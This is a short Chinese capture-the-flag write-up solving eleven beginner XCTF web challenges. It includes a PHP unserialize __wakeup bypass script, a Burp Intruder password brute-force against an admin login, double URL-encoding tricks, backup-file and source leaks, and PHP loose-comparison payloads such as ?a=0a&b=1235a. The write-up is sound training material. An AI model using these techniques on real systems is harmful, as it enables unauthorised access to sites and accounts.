XCTF刷题十一道（01）

Training-WWW-Robots

robots.txt，防爬虫，访问url+robots.txt

PHP2

phps源码泄露

>`phps`文件就是`php`的源代码文件，通常用于提供给用户(访问者)查看`php`代码，因为用户无法直接通过浏览器看到`php`文件内容，所以需要用`phps`文件代替。
>它的MIME类型为：text/html, application/x-httpd-php-source, application/x-httpd-php3-source。

admin二次url编码传入id参数

unserialize3

class xctf{
public $flag = '111';
public function __wakeup(){
exit('bad requests');
}
?code=

<?php

class xctf{
public $flag = '';
public function __wakeup(){
exit('bad requests');
}

}

$a = new xctf;
echo urlencode(serialize($a));

更改对象个数

view-source

ctrl+u查看源码

get_post

robots

backup

访问index.php.bak文件
index备份文件

cookie

disabled_button

右键按钮点检查，或者ctrl+shift+c选中也可以


删掉，再点按钮

weak_auth

burp抓包，放intruder，用户名admin，密码位置添加变量

密码找个字典添加进去

123456

simple_php

<?php
show_source(__FILE__);
include("config.php");
$a=@$_GET['a'];
$b=@$_GET['b'];
if($a==0 and $a){ //弱比较，不同类型比较会发生强制类型转换，截断
    echo $flag1;
}
if(is_numeric($b)){ //任意字母+数字组合，is_numeric无法识别
    exit();
}
if($b>1234){ //1235a>1234，截断比较
    echo $flag2;
}
?>

?a=0a&b=1235a